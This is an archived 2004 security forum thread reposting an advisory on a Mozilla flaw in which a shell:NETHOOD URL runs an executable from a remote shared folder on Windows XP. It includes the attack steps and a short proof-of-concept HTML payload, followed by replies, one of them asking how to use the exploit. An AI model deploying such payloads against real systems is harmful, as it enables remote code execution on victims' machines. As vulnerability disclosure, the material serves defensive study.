hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
n0vun
Jul 9 2004, 05:55 AM
This Advisory is Copyright © 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bu...q/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

############################################################
[START] PROOF OF CONCEPT
############################################################
<!--
MOZILLA REMOTE COMPROMISE DEMO

REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.

CREATED BY:Liu Die Yu

COPYRIGHT:
This Demo is Copyright © 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
-->

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

-----------------------
More info,
http://www.mozilla.org/security/shell.html


SET_coo
Jul 9 2004, 06:20 AM
interesting. very interesting. another img src exploit. when will they stop?
easternerd
Jul 9 2004, 09:09 AM
Not just Interesting ,
But Disturbing !!!

The Bugs follow the Route and Path of Popularity!!!
Security Through Obscurity ?
pr0t0type
Jul 9 2004, 08:23 PM
QUOTE (easternerd @ Jul 9 2004, 09:09 AM)
The Bugs follow the Route and Path of Popularity!!!
Security Through Obscurity ?

Yea, It'll be the real testing time for mozilla now it's getting more and more popular. Mund you, IE has set a hell of a record to beat for the number of expoits.
x1`
Jul 9 2004, 08:45 PM
sorry to sound noob but does anyone have any instructions how to use this exploit , thanks if you can help and provide instructions
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.